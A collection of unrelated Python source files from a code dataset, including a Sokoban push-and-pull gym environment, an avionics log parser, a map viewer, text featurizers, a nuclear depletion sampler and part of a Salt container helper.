# this is similar to the draw history code
out_im_agent = np.zeros((self.raster_size[1], self.raster_size[0], 3), dtype=np.float32)
agent_chs = in_im[:hist_frames][::-1] # reverse to start from the furthest one
agent_color = (0, 0, 1) if "agent_color" not in kwargs else kwargs["agent_color"]
for ch in agent_chs:
out_im_agent *= 0.85 # magic fading constant for the past
out_im_agent[ch > 0] = agent_color
out_im_ego = np.zeros((self.raster_size[1], self.raster_size[0], 3), dtype=np.float32)
ego_chs = in_im[hist_frames:][::-1]
ego_color = (0, 1, 0) if "ego_color" not in kwargs else kwargs["ego_color"]
for ch in ego_chs:
out_im_ego *= 0.85
out_im_ego[ch > 0] = ego_color
out_im = (np.clip(out_im_agent + out_im_ego, 0, 1) * 255).astype(np.uint8)
return out_im
|
the-stack_0_25292
|
from .sokoban_env import SokobanEnv, CHANGE_COORDINATES
from gym.spaces import Box
from gym.spaces.discrete import Discrete
class PushAndPullSokobanEnv(SokobanEnv):
def __init__(self,
dim_room=(10, 10),
max_steps=120,
num_boxes=3,
num_gen_steps=None,
**kwargs):
super(PushAndPullSokobanEnv, self).__init__(
dim_room=dim_room,
max_steps=max_steps,
num_boxes=num_boxes,
num_gen_steps=num_gen_steps)
# screen_height, screen_width = (dim_room[0] * 16, dim_room[1] * 16)
# self.observation_space = Box(low=0, high=255, shape=(screen_height, screen_width, 3))
# self.boxes_are_on_target = [False] * num_boxes
self.action_space = Discrete(len(self.get_action_lookup()))
_ = self.reset()
def step(self, action, observation_mode='rgb_array'):
assert action in ACTION_LOOKUP
self.num_env_steps += 1
self.new_box_position = None
self.old_box_position = None
moved_box = False
if action == 0:
moved_player = False
# All push actions are in the range of [0, 3]
if action < 5:
moved_player, moved_box = self._push(action)
elif action < 9:
moved_player = self._move(action)
else:
moved_player, moved_box = self._pull(action)
self._calc_reward()
done = self._check_if_done()
# Convert the observation to RGB frame
observation = self.render(mode=observation_mode)
info = {
"action.name": ACTION_LOOKUP[action],
"action.moved_player": moved_player,
"action.moved_box": moved_box,
}
if done:
info["maxsteps_used"] = self._check_if_maxsteps()
info["all_boxes_on_target"] = self._check_if_all_boxes_on_target()
return observation, self.reward_last, done, info
def _pull(self, action):
"""
Moves the player to the next field, if it is not occupied.
:param action:
:return: Boolean, indicating a change of the room's state
"""
change = CHANGE_COORDINATES[(action - 1) % 4]
new_position = self.player_position + change
current_position = self.player_position.copy()
pull_content_position = self.player_position - change
# Move player if the field in the moving direction is either
# an empty field or an empty box target.
if self.room_state[new_position[0], new_position[1]] in [1, 2]:
self.player_position = new_position
self.room_state[(new_position[0], new_position[1])] = 5
self.room_state[current_position[0], current_position[1]] = \
self.room_fixed[current_position[0], current_position[1]]
box_next_to_player = self.room_state[pull_content_position[0], pull_content_position[1]] in [3, 4]
if box_next_to_player:
# Move Box
box_type = 4
if self.room_fixed[current_position[0], current_position[1]] == 2:
box_type = 3
self.room_state[current_position[0], current_position[1]] = box_type
self.room_state[pull_content_position[0], pull_content_position[1]] = \
self.room_fixed[pull_content_position[0], pull_content_position[1]]
return True, box_next_to_player
return False, False
def get_action_lookup(self):
return ACTION_LOOKUP
def get_action_meanings(self):
return ACTION_LOOKUP
ACTION_LOOKUP = {
0: 'no operation',
1: 'push up',
2: 'push down',
3: 'push left',
4: 'push right',
5: 'move up',
6: 'move down',
7: 'move left',
8: 'move right',
9: 'pull up',
10: 'pull down',
11: 'pull left',
12: 'pull right',
}
|
the-stack_0_25293
|
import struct
from typing import BinaryIO, List
from .Exceptions import *
class Record(object):
"""
one 512 byte record from IEFISBB.DAT
"""
timestamp: int
buffer: bytearray
position: int
eof: bool
def __init__(self, timestamp: int, buffer: bytearray):
self.timestamp = timestamp
self.buffer = buffer
self.position = 0
self.eof = False
def read(self, qty: int) -> bytearray:
"""
read qty bytes from the record
:param qty:
:return: bytearray
"""
if self.eof:
raise EndOfRecord()
remaining = len(self.buffer) - self.position
if qty < remaining:
buffer_slice = self.buffer[self.position: self.position + qty]
self.position += qty
return buffer_slice
else:
self.eof = True
return self.buffer[self.position:]
class MglPacketStream(object):
"""
stream of packets (a/k/a records) sent from the MGL iEFIS and stored in IEFISBB.DAT
"""
filepointer: BinaryIO
records: List[Record]
current_record: int
eof: bool
unread_buffer: bytearray
timestamp: int
RECORDSIZE = 512
def __init__(self, fp: BinaryIO, min_timestamp: int = 0, max_timestamp: int = 9000000000):
self.records = []
self.current_record = 0
self.eof = False
self.unread_buffer = bytearray(0)
self.filepointer = fp
self._load_records(min_timestamp, max_timestamp)
self._sort_records()
# print('Record timestamps:')
# lastTs = 0
# for record in self.records:
# print(' {ts:,}'.format(ts=record.timestamp))
# lastTs = record.timestamp
# print('*' * 100)
def _load_records(self, min_timestamp: int, max_timestamp: int) -> None:
while True:
buffer = self.filepointer.read(self.RECORDSIZE)
if 0 == len(buffer):
return
(timestamp, buf) = struct.unpack_from('I 508s', buffer)
if 0 != timestamp and (min_timestamp <= timestamp <= max_timestamp):
self.records.append(Record(timestamp, bytearray(buf)))
def _sort_records(self) -> None:
"""
Reorder the records so that they are in ascending order, so that nothing else has to deal with a flight
which wraps back to the beginning of the file
:return:
"""
for boundary in range(0, len(self.records) - 2):
if self.records[boundary].timestamp > self.records[boundary + 1].timestamp:
a = self.records[boundary + 1:]
b = self.records[:boundary + 1]
self.records = a + b
def read(self, qty: int) -> bytearray:
"""
read qty bytes from the stream, first checking for unread bytes (had been read and then pushed back ito the
stream) and then reading from as many records as necessary
:param qty:
:return: bytearray
"""
if self.eof:
raise EndOfFile()
if 0 < len(self.unread_buffer):
unread_bytes = min(len(self.unread_buffer), qty)
buffer = self.unread_buffer[:unread_bytes]
self.unread_buffer = self.unread_buffer[unread_bytes:]
if len(buffer) == qty:
return buffer
else:
buffer = bytearray(0)
still_needed = qty - len(buffer)
if self.records[self.current_record].eof:
self._next_record()
buffer.extend(self.records[self.current_record].read(still_needed))
self.timestamp = self.records[self.current_record].timestamp
if len(buffer) == qty:
return buffer
else:
self._next_record()
still_needed = qty - len(buffer)
buffer2 = self.read(still_needed)
buffer.extend(buffer2)
return buffer
def _next_record(self) -> None:
"""
get another record
:return:
"""
self.current_record += 1
if self.current_record >= len(self.records):
self.eof = True
raise EndOfFile()
def unread(self, buffer: int) -> None:
"""
take back, and store, a few bytes which had been read but were not needed
:param buffer:
:return:
"""
b = bytearray([buffer])
self.unread_buffer.extend(b)
|
the-stack_0_25295
|
from typing import Any, Callable, Dict, Tuple
from IPython.core.display import display
import xarray as xr
import matplotlib.pyplot as plt
# from bqplot import Axis, Figure, Lines, LinearScale
# from bqplot.interacts import IndexSelector
# from bqplot import pyplot as plt
# from ipyleaflet import basemaps, FullScreenControl, LayerGroup, Map, MeasureControl, Polyline, Marker, MarkerCluster, CircleMarker, WidgetControl
# from ipywidgets import Button, HTML, HBox, VBox, Checkbox, FileUpload, Label, Output, IntSlider, Layout, Image, link
from ipywidgets import Output, HTML
from ipyleaflet import Map, Marker, MarkerCluster, basemaps
# Had unexpected issues with displaying matplotlib in output widgets.
# https://github.com/jupyter-widgets/ipywidgets/issues/1853#issuecomment-349201240 seems to do the job...
from ipywidgets.widgets.interaction import show_inline_matplotlib_plots
class GeoViewer:
def __init__(self, x_data:xr.Dataset, lat:str='lat', lon:str='lon', key:str='station'):
# TODO: checks on inputs
self.marker_info:Dict[Tuple[float,float],str] = dict()
self.x_data = x_data
lats = x_data[lat].values
lons = x_data[lon].values
self.lat_key = lat
self.lon_key = lon
self.key = key
values = x_data[key].values
n= len(lats)
for i in range(n):
self.add_marker_info(lats[i], lons[i], values[i])
self.create_popup = self._simple_html_popup()
def add_marker_info(self, lat:float, lon:float, code:str):
self.marker_info[(lat, lon)] = code
def get_code(self, lat:float, lon:float):
return self.marker_info[(lat, lon)]
def data_for_identifier(self, ident):
raise NotImplementedError()
def popup_factory(self, func:Callable[[Tuple[float,float]],HTML]):
self.create_popup = func
def _simple_html_popup(self) -> Callable:
def f(location):
message = HTML()
message.description = "Station ID"
message.value = str(self.marker_info[location])
message.placeholder = ""
return message
return f
def build_map(self, click_handler:Callable[[Dict[str,Any]], None]) -> Map:
mean_lat = self.x_data[self.lat_key].values.mean()
mean_lng = self.x_data[self.lon_key].values.mean()
# create the map
m = Map(center=(mean_lat, mean_lng), zoom=4, basemap=basemaps.Stamen.Terrain)
m.layout.height = '1200px'
# show trace
markers = []
for k in self.marker_info:
message = self.create_popup(k)
marker = Marker(location=k)
marker.on_click(click_handler)
marker.popup = message
markers.append(marker)
marker_cluster = MarkerCluster(
markers=markers
)
# not sure whether we could register once instead of each marker:
# marker_cluster.on_click(click_handler)
m.add_layer(marker_cluster)
# m.add_control(FullScreenControl())
return m
def get_data(self, variable:str, loc_id:str, dim_id:str = None):
"""
"""
if dim_id is None:
dim_id = self.key
return self.x_data[variable].sel({dim_id: loc_id})
def plot_series(self, out_widget:Output, variable: str, loc_id: str, dim_id:str = None):
"""
"""
tts = self.get_data(variable=variable, loc_id=loc_id, dim_id=dim_id)
# if using bqplot down the track, see https://github.com/jtpio/voila-gpx-viewer
out_widget.clear_output()
with out_widget:
_ = tts.plot(figsize=(16,8))
# do not use display(blah) which then displays the obnoxious matplotlib.lines.Line2D object at etc.>]
ax = plt.gca()
ax.set_title(loc_id)
show_inline_matplotlib_plots()
def mk_click_handler_plot_ts(self, out_widget:Output, variable='q_obs_mm'):
def click_handler_plot_ts(**kwargs):
xy = kwargs['coordinates']
ident = self.get_code(xy[0], xy[1])
self.plot_series(out_widget, variable=variable, loc_id=ident)
return click_handler_plot_ts
# If printing a data frame straight to an output widget
# def raw_print(out, ident):
# x_data = globalthing.data_for_identifier(ident)
# out.clear_output()
# with out:
# print(ident)
# print(x_data)
# def click_handler_rawprint(**kwargs):
# blah = dict(**kwargs)
# xy = blah['coordinates']
# ident = globalthing.get_code(xy[0], xy[1])
# raw_print(out, ident)
def click_handler_no_op(**kwargs):
return
|
the-stack_0_25296
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import sys
import argparse
import base64
import urllib.parse
import random
def base64_encode(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--decode', action='store_true', help='base64 decode')
parser.add_argument('input', help='the str to be encode/decode')
if not args:
args = sys.argv[1:]
result = parser.parse_args(args)
if result.decode:
__base64_decode(result.input)
else:
__base64_encode(result.input)
def url_encode(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--decode', action='store_true', help='url decode')
parser.add_argument('input', help='the str to be encode/decode')
if not args:
args = sys.argv[1:]
result = parser.parse_args(args)
if result.decode:
__url_decode(result.input)
else:
__url_encode(result.input)
def roll(min=1, max=100):
try:
max = int(sys.argv[2])
except IndexError as e:
try:
max = int(sys.argv[1])
except:
pass
else:
min = int(sys.argv[1])
num = random.randint(min, max)
print(num)
def __base64_encode(s):
print(base64.standard_b64encode(s.encode()).decode())
def __base64_decode(s):
print(base64.standard_b64decode(s.encode()).decode())
def __url_encode(s):
print(urllib.parse.quote(s))
def __url_decode(s):
print(urllib.parse.unquote(s))
def main():
base64_encode(['hello'])
url_encode(['https://www.baidu.com'])
roll()
roll(10)
roll(12, 13)
if __name__ == '__main__':
main()
|
the-stack_0_25297
|
"""
Class responsible for reading multiple depletion files
and obtaining true uncertainties
"""
from math import fabs
from numpy import zeros, zeros_like
from matplotlib import pyplot
from serpentTools.messages import SamplerError, warning
from serpentTools.utils import (
magicPlotDocDecorator, formatPlot, DEPLETION_PLOT_LABELS,
)
from serpentTools.objects.materials import DepletedMaterialBase
from serpentTools.parsers.depletion import DepletionReader, DepPlotMixin
from serpentTools.samplers.base import (
Sampler, SampledContainer,
)
CONSTANT_MDATA = ('names', 'zai')
"""metadata that should be invariant throughout repeated runs"""
VARIED_MDATA = ('days', 'burnup')
"""metadata that could be varied throughout repeated runs"""
class DepletionSampler(DepPlotMixin, Sampler):
__doc__ = """
Class that reads and stores data from multiple ``*dep.m`` files
The following checks are performed in order to ensure that depletion
files are of similar form:
1. Keys of ``materials`` dictionary are consistent for all parsers
2. Metadata keys are consistent for all parsers
3. Isotope names and ZZAAA metadata are equal for all parsers
These tests can be skipped by settings ``<sampler.skipPrecheck>`` to be
``False``.
Parameters
----------
files: str or iterable
Single file or iterable (list) of files from which to read.
Supports file globs, ``*dep.m`` expands to all files that
end with ``dep.m``
Attributes
----------
materials: dict
Dictionary with material names as keys and the corresponding
:py:class:`~serpentTools.objects.materials.DepletedMaterial` class
for that material as values
metadata: dict
Dictionary with file-wide data names as keys and the
corresponding data, e.g. ``'zai'``: [list of zai numbers]
metadataUncs: dict
Dictionary containing uncertainties in file-wide metadata,
such as burnup schedule
allMdata: dict
Dictionary where key, value pairs are name of metadata and
metadata arrays for all runs. Arrays with be of one greater dimension,
as the first index corresponds to the file index.
files: set
Unordered set containing full paths of unique files read
settings: dict
Dictionary of sampler-wide settings
parsers: set
Unordered set of all parsers that were successful
map: dict
Dictionary where key, value pairs are files and their corresponding
parsers
"""
def __init__(self, files):
self.materials = {}
self.metadata = {}
self.metadataUncs = {}
self.allMdata = {}
Sampler.__init__(self, files, DepletionReader)
DepPlotMixin.__init__(self)
def __getitem__(self, name):
"""Retrieve a material from :attr:`materials`."""
return self.materials[name]
def _precheck(self):
self._checkParserDictKeys('materials')
self._checkParserDictKeys('metadata')
self._checkMetadata()
def _checkMetadata(self):
misMatch = {}
for parser in self:
for key, value in parser.metadata.items():
valCheck = (tuple(value) if key in CONSTANT_MDATA
else value.size)
if key not in misMatch:
misMatch[key] = {}
if valCheck not in misMatch[key]:
misMatch[key][valCheck] = {parser.filePath}
else:
misMatch[key][valCheck].add(parser.filePath)
for mKey, matches in misMatch.items():
if len(matches) > 1:
self._raiseErrorMsgFromDict(matches, 'values',
'{} metadata'.format(mKey))
def _process(self):
for N, parser in enumerate(self.parsers):
if not self.metadata:
self.__allocateMetadata(parser.metadata)
self._copyMetadata(parser.metadata, N)
for matName, material in parser.materials.items():
if matName in self.materials:
sampledMaterial = self.materials[matName]
else:
numFiles = len(self.parsers)
self.materials[matName] = sampledMaterial = (
SampledDepletedMaterial(numFiles, material.name,
parser.metadata))
sampledMaterial.loadFromContainer(material)
self._finalize()
def _finalize(self):
for _matName, material in self.materials.items():
material.finalize()
for key in VARIED_MDATA:
allData = self.allMdata[key]
self.metadata[key] = allData.mean(axis=0)
self.metadataUncs[key] = allData.std(axis=0)
def __allocateMetadata(self, parserMdata):
for key in CONSTANT_MDATA:
self.metadata[key] = parserMdata[key]
vectorShape = tuple([len(self.files)]
+ list(parserMdata['days'].shape))
for key in VARIED_MDATA:
self.allMdata[key] = zeros(vectorShape)
def _copyMetadata(self, parserMdata, N):
for key in VARIED_MDATA:
self.allMdata[key][N, ...] = parserMdata[key]
def _free(self):
self.allMdata = {}
for _mName, material in self.materials.items():
material.free()
def iterMaterials(self):
"""Yields material names and objects"""
for name, material in self.materials.items():
yield name, material
class SampledDepletedMaterial(SampledContainer, DepletedMaterialBase):
__doc__ = """
Class that stores data from a variety of depleted materials
{equiv:s}
.. note ::
:py:func:`~serpentTools.samplers.depletion.SampledDepletedMaterial.free`
sets ``allData`` to an empty dictionary {free:s}
Parameters
----------
N: int
Number of containers to expect
name: str
Name of this material
metadata: dict
File-wide metadata for this run. Should contain ZAI and names for all
isotopes, days, and burnup schedule
Attributes
----------
{depAttrs:s}
uncertainties: dict
Absolute uncertainties for all variables stored in ``data``
allData: dict
Dictionary where key, value pairs correspond to names of
variables stored on this object and arrays of data from all files.
The dimensionality will be increased by one, as the first index
corresponds to the order in which files were loaded
""".format(free=SampledContainer.docFree,
equiv=DepletedMaterialBase.docEquiv,
depAttrs=DepletedMaterialBase.docAttrs)
def __init__(self, N, name, metadata):
SampledContainer.__init__(self, N, DepletedMaterialBase)
DepletedMaterialBase.__init__(self, name, metadata)
self.uncertainties = {}
self.allData = {}
def _loadFromContainer(self, container):
if container.name != self.name:
warning("Attempting to store data from material {} onto "
"sampled material {}".format(self.name, container.name))
for varName, varData in container.data.items():
if not self.allData:
self.__allocateLike(container)
self.allData[varName][self._index] = varData
def __allocateLike(self, container):
for varName, varData in container.data.items():
shape = tuple([self.N] + list(varData.shape))
self.allData[varName] = zeros(shape)
def _finalize(self):
for varName, varData in self.allData.items():
self.data[varName] = varData.mean(axis=0)
self.uncertainties[varName] = varData.std(axis=0)
def free(self):
"""Clear up data from all sampled parsers"""
self.allData = {}
@magicPlotDocDecorator
def plot(self, xUnits, yUnits, timePoints=None, names=None, ax=None,
sigma=3, xlabel=None, ylabel=None, logx=False,
logy=False, loglog=False, legend=None, ncol=1, labelFmt=None,
**kwargs):
"""
Plot the average of some data vs. time for some or all isotopes.
.. note::
``kwargs`` will be passed to the errorbar plot for all
isotopes. If ``c='r'`` is passed, to make a plot red, then
data for all isotopes plotted will be red and potentially
very confusing.
Parameters
----------
xUnits: str
name of x value to obtain, e.g. ``'days'``, ``'burnup'``
yUnits: str
name of y value to return, e.g. ``'adens'``, ``'burnup'``
timePoints: list or None
If given, select the time points according to those
specified here. Otherwise, select all points
names: list or None
If given, return y values corresponding to these isotope
names. Otherwise, return values for all isotopes.
{ax}
{sigma}
{xlabel}
{ylabel}
{logx}
{logy}
{loglog}
{legend}
{ncol}
{matLabelFmt}
{kwargs} :py:func:`matplotlib.pyplot.errorbar`
Returns
-------
{rax}
See Also
--------
* :meth:`~serpentTools.objects.materials.
DepletedMaterialBase.getValues`
* :func:`matplotlib.pyplot.errorbar`
"""
if sigma and yUnits not in self.uncertainties:
raise KeyError("Uncertainties for {} not stored"
.format(yUnits))
if xUnits not in ('days', 'burnup'):
raise KeyError("Plot method only uses x-axis data from <days> "
"and <burnup>, not {}".format(xUnits))
xVals = timePoints if timePoints is not None else (
self.days if xUnits == 'days' else self.burnup)
sigma = int(fabs(sigma))
colIndices = self._getColIndices(xUnits, timePoints)
rowIndices = self._getRowIndices(names)
yVals = self._slice(self.data[yUnits], rowIndices, colIndices)
yUncs = self._slice(self.uncertainties[yUnits], rowIndices, colIndices)
if xUnits in self.uncertainties and sigma:
xUncs = (sigma * self._slice(self.uncertainties[xUnits], None,
colIndices))
else:
xUncs = zeros_like(xVals)
ax = ax or pyplot.gca()
labels = self._formatLabel(labelFmt, names)
yVals = yVals.copy(order='F')
yUncs = yUncs.copy(order='F') * sigma
for row in range(yVals.shape[0]):
ax.errorbar(xVals, yVals[row], yerr=yUncs[row], xerr=xUncs,
label=labels[row], **kwargs)
ax = sigmaLabel(ax, xlabel or DEPLETION_PLOT_LABELS[xUnits],
ylabel or DEPLETION_PLOT_LABELS[yUnits], sigma)
formatPlot(ax, legend=legend, ncol=ncol, loglog=loglog, logx=logx,
logy=logy)
return ax
@magicPlotDocDecorator
def spreadPlot(self, xUnits, yUnits, isotope=None, zai=None,
sampleKwargs=None, meanKwargs=None,
timePoints=None, ax=None,
xlabel=None, ylabel=None, logx=False, logy=False,
loglog=False, legend=True):
"""
Plot the mean quantity and data from all sampled files.
Parameters
----------
xUnits : str
name of x value to obtain, e.g. ``'days'``, ``'burnup'``
yUnits : str
name of y value to return, e.g. ``'adens'``, ``'burnup'``
isotope : str, optional
Plot data for this isotope
zai : int, optional
Plot data for this isotope. Not allowed if ``isotope`` given.
sampleKwargs : dict, optional
Additional matplotlib-acceptable arguments to be passed into the
plot when plotting data from unique runs, e.g.
``{"c": k, "alpha": 0.5}``.
meanKwargs : dict, optional
Additional matplotlib-acceptable argumentst to be used when
plotting the mean value, e.g. ``{"c": "b", "marker": "o"}``
timePoints : list or None
If given, select the time points according to those
specified here. Otherwise, select all points
{ax}
{xlabel}
{ylabel}
{logx}
{logy}
{loglog}
{legend}
Returns
-------
{rax}
"""
if not self.allData:
raise SamplerError("Data from all sampled files has been freed "
"and cannot be used in this plot method")
if isotope is not None and zai is not None:
raise ValueError("Please specify isotope name or zai, not both")
elif isotope is None and zai is None:
raise ValueError("Isotope name or zai needed")
if sampleKwargs is None:
sampleKwargs = {"c": "k", "alpha": 0.5, "marker": ""}
if meanKwargs is None:
meanKwargs = {"c": "#0173b2", "marker": "o"}
ax = ax or pyplot.gca()
if xUnits not in ('days', 'burnup'):
raise KeyError("Plot method only uses x-axis data from <days> "
"and <burnup>, not {}".format(xUnits))
xVals = timePoints if timePoints is not None else (
self.days if xUnits == 'days' else self.burnup)
if isotope is not None:
rows = self._getRowIndices("names", [isotope])
else:
rows = self._getRowIndices("zai", [zai])
cols = self._getColIndices(xUnits, timePoints)
primaryData = self._slice(self.data[yUnits], rows, cols)[0]
for data in self.allData[yUnits][:self._index]:
plotData = self._slice(data, rows, cols)[0]
ax.plot(xVals, plotData, **sampleKwargs)
ax.plot(xVals, primaryData, label='Mean value', **meanKwargs)
ax = sigmaLabel(ax, xlabel or DEPLETION_PLOT_LABELS[xUnits],
ylabel or DEPLETION_PLOT_LABELS[yUnits])
formatPlot(ax, legend=legend, logx=logx, logy=logy, loglog=loglog)
return ax
def sigmaLabel(ax, xlabel, ylabel, sigma=None):
"""Label the axes on a figure with some uncertainty."""
confStr = r'$\pm{} \sigma$'.format(sigma) if sigma is not None else ''
ax.set_xlabel(xlabel + confStr)
ax.set_ylabel(ylabel + confStr)
return ax
|
the-stack_0_25300
|
from typing import List
# pre_model_basic_words = load_pre_model(os.path.join(os.path.dirname(__file__),
# './pre_models/basic_words.pkl'))
# pip install lexicalrichness
from lexicalrichness import LexicalRichness
# nltk package for featurizing
import nltk
# spacy package for featurizing
import spacy
from datalabs.operations.featurize.featurizing import featurizing
# pretrained models
from datalabs.operations.featurize.utils.util_model import (
BASIC_WORDS,
load_gender_bias_data,
)
# from hatesonar import Sonar
# sonar = Sonar()
# print(pre_model_basic_words)
@featurizing(
name="get_length",
contributor="datalab",
task="Any",
description="This function is used to calculate the length of a text",
)
def get_length(text: str) -> str:
"""
Package: python
Input:
text:str
Output:
integer
"""
# text = sample["text"]
return {"length": len(text.split(" "))}
# return
@featurizing(
name="get_entities_spacy",
contributor="spacy",
task="Any",
description="Extract entities of a given text by using spacy library.",
)
def get_entities_spacy(text: str) -> List[str]:
nlp = spacy.load("en_core_web_sm") # this should be pre-reloaded
doc = nlp(text)
entities = [(ent.text, ent.label_) for ent in doc.ents]
return {"entities": entities}
# return entities
@featurizing(
name="get_postag_spacy",
contributor="spacy",
task="Any",
description="Part-of-speech tagging of a given text by using spacy library.",
)
def get_postag_spacy(text: str) -> List[str]:
nlp = spacy.load("en_core_web_sm") # this should be pre-reloaded
doc = nlp(text)
# token_postags = [(token.text, token.tag_) for token in doc]
tokens = [token.text for token in doc]
tags = [token.tag_ for token in doc]
return {"tokens": tokens, "pos_tags": tags}
@featurizing(
name="get_postag_nltk",
contributor="nltk",
task="Any",
description="Part-of-speech tagging of a given text by " "using NLTK library",
)
def get_postag_nltk(text: str) -> List:
"""
Package: nltk.pos_tag
Input:
text:str
Output:
List
"""
from nltk import pos_tag
try:
nltk.pos_tag([])
except LookupError:
nltk.download("averaged_perceptron_tagger")
token_tag_tuples = pos_tag(text.split(" "))
tokens = [xx[0] for xx in token_tag_tuples]
tags = [xx[1] for xx in token_tag_tuples]
# pos_tags = [(res[0], res[1]) for res in token_tag_tuples]
return {"tokens": tokens, "pos_tags": tags}
@featurizing(
name="get_basic_words",
contributor="datalab",
task="Any",
description="Calculate the ratio of basic words in a given text",
)
def get_basic_words(sentence: str):
# the sentence must written in english
# sample level
# sentence : string 'XXX'
if BASIC_WORDS is None:
raise ValueError("basic word dictionary is none")
value_list = sentence.split(" ")
n_words = len(value_list)
n_basic_words = 0
for word in value_list:
lower = word.lower()
if lower in BASIC_WORDS:
n_basic_words = n_basic_words + 1
return {"basic_word_ratio": n_basic_words * 1.0 / n_words}
# return n_basic_words*1.0/n_words
@featurizing(
name="get_lexical_richness",
contributor="lexicalrichness",
task="Any",
description="Calculate the lexical richness (i.e.lexical diversity)" " of a text",
)
def get_lexical_richness(sentence: str):
# sample level
# sentence : string 'XXX'
from lexicalrichness import LexicalRichness
# print(f"-------\n{sentence}\n")
lex = LexicalRichness(sentence)
results = 0
try:
results = lex.ttr
except ZeroDivisionError:
print(
f'the sentence "{sentence}" contain no effective words, we will'
f" return 0 instead!"
)
finally:
# return results
return {"lexical_diversity": results}
gendered_dic = load_gender_bias_data()
@featurizing(
name="get_gender_bias",
contributor="datalab",
task="Any",
description="Calculate the number of man/women tokens of a given text",
)
def get_gender_bias(sentence: str):
# if gendered_dic is None:
# gendered_dic = load_gender_bias_data()
one_words_results = get_gender_bias_one_word(
gendered_dic["words"]["male"],
gendered_dic["words"]["female"],
gendered_dic["single_name"]["male"],
gendered_dic["single_name"]["female"],
sentence,
)
results = {
"word": {
"male": one_words_results["words_m"],
"female": one_words_results["words_f"],
},
"single_name": {
"male": one_words_results["single_name_m"],
"female": one_words_results["single_name_f"],
},
}
# return results
return {"gender_bias_info": results}
def get_gender_bias_one_word(words_m, words_f, single_name_m, single_name_f, sentence):
words_sentence = sentence.lower().split(" ")
results = {
"words_m": 0,
"words_f": 0,
"single_name_m": 0,
"single_name_f": 0,
}
for value in words_sentence:
if value in words_m:
results["words_m"] += 1
if value in words_f:
results["words_f"] += 1
if value in single_name_m:
results["single_name_m"] += 1
if value in single_name_f:
results["single_name_f"] += 1
return results
"""
from datalabs import load_dataset
dataset = load_dataset("mr")
from featurize import *
res = dataset['test'].apply(get_features_sample_level, mode = "memory")
"""
@featurizing(
name="get_features_sample_level",
contributor="datalab",
task="Any",
description="calculate a set of features for general text",
)
def get_features_sample_level(text: str):
# for hate speech
# from hatesonar import Sonar
# sonar = Sonar()
# text length
length = len(text.split(" "))
# lexical_richness
lex = LexicalRichness(text)
lexical_richness = float(0.0)
try:
lexical_richness = lex.ttr
except ZeroDivisionError:
print(
f'the sentence "{text}" contain no effective words, we will'
f" return 0 instead!"
)
# ratio of basic words
if BASIC_WORDS is None:
raise ValueError("basic word dictionary is none")
value_list = text.split(" ")
n_words = len(value_list)
n_basic_words = 0
for word in value_list:
lower = word.lower()
if lower in BASIC_WORDS:
n_basic_words = n_basic_words + 1
basic_words = n_basic_words * 1.0 / n_words if n_words != 0 else float(0)
# Gender bias
one_words_results = get_gender_bias_one_word(
gendered_dic["words"]["male"],
gendered_dic["words"]["female"],
gendered_dic["single_name"]["male"],
gendered_dic["single_name"]["female"],
text,
)
# # # hataspeech
# hatespeech = {}
# results = sonar.ping(text=text)
# class_ = results['top_class']
# confidence = float(0)
# for value in results['classes']:
# if value['class_name'] == class_:
# confidence = value['confidence']
# break
# hate_speech_detection = {"hate_speech_type":class_, "confidence":confidence}
# pyarrow will report error if saving json
return {
"length": length,
"lexical_richness": lexical_richness,
"basic_words": basic_words,
"gender_bias_word_male": one_words_results["words_m"],
"gender_bias_word_female": one_words_results["words_f"],
"gender_bias_single_name_male": one_words_results["single_name_m"],
"gender_bias_single_name_female": one_words_results["single_name_f"],
# "hate_speech_detection":class_,
}
|
the-stack_0_25303
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LinkedIntegrationRuntime(Model):
"""The linked integration runtime information.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: The name of the linked integration runtime.
:vartype name: str
:ivar subscription_id: The subscription ID for which the linked
integration runtime belong to.
:vartype subscription_id: str
:ivar data_factory_name: The name of the data factory for which the linked
integration runtime belong to.
:vartype data_factory_name: str
:ivar data_factory_location: The location of the data factory for which
the linked integration runtime belong to.
:vartype data_factory_location: str
:ivar create_time: The creating time of the linked integration runtime.
:vartype create_time: datetime
"""
_validation = {
'name': {'readonly': True},
'subscription_id': {'readonly': True},
'data_factory_name': {'readonly': True},
'data_factory_location': {'readonly': True},
'create_time': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'data_factory_name': {'key': 'dataFactoryName', 'type': 'str'},
'data_factory_location': {'key': 'dataFactoryLocation', 'type': 'str'},
'create_time': {'key': 'createTime', 'type': 'iso-8601'},
}
def __init__(self):
super(LinkedIntegrationRuntime, self).__init__()
self.name = None
self.subscription_id = None
self.data_factory_name = None
self.data_factory_location = None
self.create_time = None
|
the-stack_0_25304
|
# -*- coding: utf-8 -*-
"""
Common resources for LXC and systemd-nspawn containers
.. versionadded:: 2015.8.0
These functions are not designed to be called directly, but instead from the
:mod:`lxc <salt.modules.lxc>`, :mod:`nspawn <salt.modules.nspawn>`, and
:mod:`docker <salt.modules.docker>` execution modules. They provide for
common logic to be re-used for common actions.
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import functools
import logging
import os
import pipes
import time
import traceback
# Import salt libs
import salt.utils.args
import salt.utils.path
import salt.utils.vt
from salt.exceptions import CommandExecutionError, SaltInvocationError
log = logging.getLogger(__name__)
PATH = "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/opt/bin:" "/usr/local/bin:/usr/local/sbin"
def _validate(wrapped):
"""
Decorator for common function argument validation
"""
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
container_type = kwargs.get("container_type")
exec_driver = kwargs.get("exec_driver")
valid_driver = {
"docker": ("lxc-attach", "nsenter", "docker-exec"),
"lxc": ("lxc-attach",),
"nspawn": ("nsenter",),
}
if container_type not in valid_driver:
raise SaltInvocationError(
"Invalid container type '{0}'. Valid types are: {1}".format(
container_type, ", ".join(sorted(valid_driver))
)
)
if exec_driver not in valid_driver[container_type]:
raise SaltInvocationError(
"Invalid command execution driver. Valid drivers are: {0}".format(
", ".join(valid_driver[container_type])
)
)
